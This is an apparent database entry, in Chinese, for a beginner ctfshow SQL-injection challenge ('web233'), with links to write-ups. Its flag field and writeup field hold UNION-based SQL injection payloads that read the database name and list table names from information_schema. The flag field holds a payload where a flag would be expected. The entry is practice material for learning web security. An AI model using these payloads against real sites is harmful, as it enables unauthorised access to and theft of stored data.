| ID: | 3522 |
|---|---|
| 标题: | web233 |
| 描述: | * 此题为 【从0开始学web】系列第二百三十三题 * 此系列题目从最基础开始,题目遵循循序渐进的原则 ``` 23333 ``` |
| 类型: | WEB入门.sql注入 |
| 网站: | ctfshow |
| 题目链接: | https://ctf.show/api/v1/challenges/690 |
| 赛事: | sql注入 |
| 年度: | None |
| Flag值: | 1' union select 1,2,database()%23 |
| writeup: |
https://blog.csdn.net/2301_80951345/article/details/138926065 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23 https://blog.csdn.net/chinese_cabbage0/article/details/140844015 |